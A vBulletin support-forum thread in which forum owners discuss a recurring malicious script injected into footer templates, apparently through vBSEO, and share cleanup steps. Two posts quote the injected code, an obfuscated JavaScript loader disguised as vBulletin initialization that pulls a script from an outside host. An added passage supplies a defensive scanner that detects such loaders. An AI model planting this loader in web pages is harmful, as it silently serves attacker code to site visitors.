A fix if your site is already exploited

  • ZeroHour
    Senior Member
    • Sep 2007
    • 167

    #16
    Originally posted by Jaxo
    OK, it appears you are correct. I removed the skin and reinstalled and it's clean. Thank you.

    I notice the original post is from 2009... still no proper fix for this?
    You need to find your Apache access logs. They give a lot of clues to what's going on and if they can still get in. Change account passwords as well.


    • Jaxo
      Member
      • Dec 2011
      • 36

      #17
      Thanks zerohour, I appreciate the help m8.


      • Jaxo
        Member
        • Dec 2011
        • 36

        #18
        Anything in particular I should be looking for?


        • Kensino
          Senior Member
          • Sep 2007
          • 609
          • 3.8.x

          #19
          Originally posted by Jaxo
          OK, it appears you are correct. I removed the skin and reinstalled and it's clean. Thank you.

          I notice the original post is from 2009... still no proper fix for this?
          Uhhh... the original post is from yesterday. What are you talking about, 2009? Please go back and read again.

          Yesterday, 2:03am


          • ZeroHour
            Senior Member
            • Sep 2007
            • 167

            #20
            Originally posted by Jaxo
            Anything in particular I should be looking for?
            Tbh, although others have said it won't help, a screenshot or list of addons might point out a recently hacked one.


            • Diablotic
              Member
              • Feb 2010
              • 83

              #21
              This is mad, I have exactly the same issue for a few days now and have no idea what is causing it. Please help.
              http://angliki.info


              • tagthis
                New Member
                • May 2006
                • 13

                #22
                Originally posted by Diablotic
                This is mad, I have exactly the same issue for a few days now and have no idea what is causing it. Please help.
                Open your footer template in the style you're using and then click save and close. This rebuilds the file and removes the exploit. This is, however, just a workaround to remove it and doesn't fix the root cause.

                +1 for the same exploit.

                VB - any word on finding how they're doing this?

                We're running VB/CMS 4.1.8 + vbSEO 3.6.0 and that's about it.


                • Diablotic
                  Member
                  • Feb 2010
                  • 83

                  #23
                  I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

                  I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
                  http://angliki.info


                  • Wayne Luke
                    vBulletin Technical Support Lead
                    • Aug 2000
                    • 73979

                    #24
                    Originally posted by tagthis
                    VB - any word on finding how they're doing this?
                    Nope... Not enough information given, no access to any of the sites with this issue. There are a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well, but most people don't even save those for more than 24 hours.
                    Translations provided by Google.

                    Wayne Luke
                    The Rabid Badger - a vBulletin Cloud demonstration site.
                    vBulletin 5 API


                    • tagthis
                      New Member
                      • May 2006
                      • 13

                      #25
                      Originally posted by Diablotic
                      I did that yesterday but it's back this morning again. I am running vbSeo as well. I can see that there is a fix for the newest version: http://www.vbseo.com/f5/vbseo-securi...release-52783/

                      I will fix it now, remove the malicious code and see if it's back again today or tomorrow.
                      Let us know how it goes. I've looked at the fix and for some reason I don't have a /vbseo/includes/functions_vbseocp_abstract.php file. So I can't apply it. Also the link to their testing utility (v3) isn't working by the looks of it.

                      Wayne, I'll open a support ticket if it comes back again.


                      • CountRock
                        New Member
                        • Jul 2011
                        • 5
                        • 4.1.x

                        #26
                        Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However, still getting the following JavaScript in the footer file. Rebuilding the footer by saving it didn't work. What can I do?

                        Code:
                            <script type="text/javascript">
                            <!--
                                // Main vBulletin Javascript Initialization
                                var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
                            //-->
                            </script>

                        Comment
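
The footer code in post #26 hides both the tag name and the script URL behind String.fromCharCode, so a plain text search for "<script src" in the templates will not find it. As an added example (not part of the thread and not vBulletin or vBSEO code), the following Node.js scanner decodes such calls as data, without evaluating anything, and flags a template only when the loader's three pieces are all present. The template names, the sample bodies and the example.invalid URL are constructed; how the template text is exported from the database is left as an assumption.

```javascript
// Static scan of exported template text for a String.fromCharCode-obfuscated
// script loader. Nothing is evaluated; the numeric arguments are decoded as data.
const CALL_RE = /String\.fromCharCode\(\s*((?:\d{1,7}\s*,\s*)*\d{1,7})\s*\)/g;

function decodeCharCodeCalls(text) {
  const hits = [];
  for (const m of text.matchAll(CALL_RE)) {
    const codes = m[1].split(',').map(n => parseInt(n, 10));
    // Skip values outside the UTF-16 code unit range instead of wrapping them.
    if (codes.some(c => c > 0xffff)) continue;
    hits.push({ offset: m.index, decoded: String.fromCharCode(...codes) });
  }
  return hits;
}

function scanTemplate(name, text) {
  const hits = decodeCharCodeCalls(text);
  const decoded = hits.map(h => h.decoded);
  const urls = decoded.filter(s => /^(https?:)?\/\//i.test(s));
  const buildsScriptTag = decoded.some(s => s.toLowerCase() === 'script');
  const appends = /\.(appendChild|insertBefore)\s*\(/.test(text);
  // Flag only when a hidden "script" tag name, a hidden URL and a DOM insert
  // all occur in the same template.
  return { template: name, hits, urls,
           suspicious: buildsScriptTag && urls.length > 0 && appends };
}

function scanAll(templates) {
  return Object.entries(templates).map(([n, t]) => scanTemplate(n, t));
}

// Constructed sample input (not from a real site): one clean footer and one
// carrying a loader shaped like the one quoted in the post.
const enc = s => `String.fromCharCode(${[...s].map(c => c.charCodeAt(0)).join(',')})`;
const SAMPLE_TEMPLATES = {
  footer_clean:
    '<script type="text/javascript">\n<!--\nvBulletin_init();\n//-->\n</script>',
  footer_injected:
    '<script type="text/javascript">\n<!--\n' +
    `var script=document.createElement(${enc('script')});` +
    `script.src=${enc('http://loader.example.invalid/compat.js')};` +
    `var head=document.getElementsByTagName(${enc('head')})[0];` +
    'head.appendChild(script);vBulletin_init();\n//-->\n</script>',
};

for (const r of scanAll(SAMPLE_TEMPLATES)) {
  console.log(r.template, r.suspicious ? 'SUSPICIOUS' : 'ok', r.urls);
}
```

Running the same scan over every template and plugin body, not just the footer, shows whether the loader was written anywhere else before the templates are rebuilt.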

                        • Mr Jolly
                          Member
                          • Feb 2008
                          • 93
                          • 3.6.x

                          #27
                          Originally posted by Wayne Luke
                          Nope... Not enough information given, no access to any of the sites with this issue. There are a number of ways that are possible. Until people actually give information about their sites instead of "delete this line to fix it" there is no way to determine how it happened. Ideally, we would need a support ticket with complete access to the server and a compromised forum to look at. We'll probably need the web logs of the date the exploit happened as well, but most people don't even save those for more than 24 hours.
                          I opened a ticket and was asked to pay $80 before you'd look at it. Then I was directed to the forums.

                          I did pay $100 for the publishing suite upgrade so I could get support for this, but no one replied to my ticket and fortunately this thread was posted and the problem was solved.

                          I gave vBulletin full access to my server, all the passwords they could possibly need.


                          • Mr Jolly
                            Member
                            • Feb 2008
                            • 93
                            • 3.6.x

                            #28
                            Originally posted by CountRock
                            Same problem! Fixed the vbSEO bug, also had a problem redirecting the URL to a 3rd party site. That has been fixed. However, still getting the following JavaScript in the footer file. Rebuilding the footer by saving it didn't work. What can I do?

                            Code:
                                <script type="text/javascript">
                                <!--
                                    // Main vBulletin Javascript Initialization
                                    var script=document.createElement(String.fromCharCode(115,99,114,105,112,116));script.src=String.fromCharCode(104,116,116,112,58,47,47,106,115,45,115,116,111,114,97,103,101,46,105,110,47,106,113,117,101,114,121,46,99,111,109,112,97,116,105,98,105,108,105,116,121,46,106,115);var head=document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0];head.appendChild(script);vBulletin_init();
                                //-->
                                </script>
                            If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.


                            • CountRock
                              New Member
                              • Jul 2011
                              • 5
                              • 4.1.x

                              #29
                              Originally posted by Mr Jolly
                              If you follow the advice in the first post that's how you remove the code from your database. In order to make sure it never returned I personally removed all plugins and all files associated with them from the server, apart from vBSEO, I just made sure that was the up-to-date version. That fixed it for me.
                              Did what the 1st post said! Fixed for the time being.


                              • dadoc
                                Member
                                • Mar 2008
                                • 82

                                #30
                                Hello,

                                I know that this problem has affected most versions of vBulletin.
                                You guys are talking about the 4x version, but it all sounds very similar to what happened to my forum.

                                I am on an old 3x version and I am not here to tell you what the problem is or how to fix it, but

                                I have been in battle with a crazy redirect which has been on for about 2 weeks.

                                It is hard to read through all the forums and see what others have said to do, and because it is an ongoing problem
                                there are few updated fixes.

                                I don't know if the problem is vBulletin or vbseo (I have the latest version installed).

                                What fixed my problem was:

                                1. Doing a full reinstall of vbseo, all files.

                                2. Changing passwords to everything, e.g. forumcp, database, cpanel, vbseocp and others (make sure to edit config for new passwords).

                                3. Changing permissions on all config files, forum and vbseo. I had done this via FTP, but after much trial and error found that this had to be done via cpanel file manager. Don't know why, it just worked!

                                4. I could not get the warning message in my vbseocp to change until I did the permission change for the config file via cpanel (the message was saying that you should edit your config permissions to secure your site). Once I did, it removed the message.

                                I hope this may help someone. I am still looking into some changes that have been made to my database:
                                extra tables were added, related to tags. I don't know much about these tables other than I did not create them and they were created
                                about the same time as I started to have problems.

                                You can have a look at a screenshot here if you want to see them.

                                Like I said, I have no answers and don't know the cause, but this worked for me.

                                Regards
                                Ryan
                                Crime case files
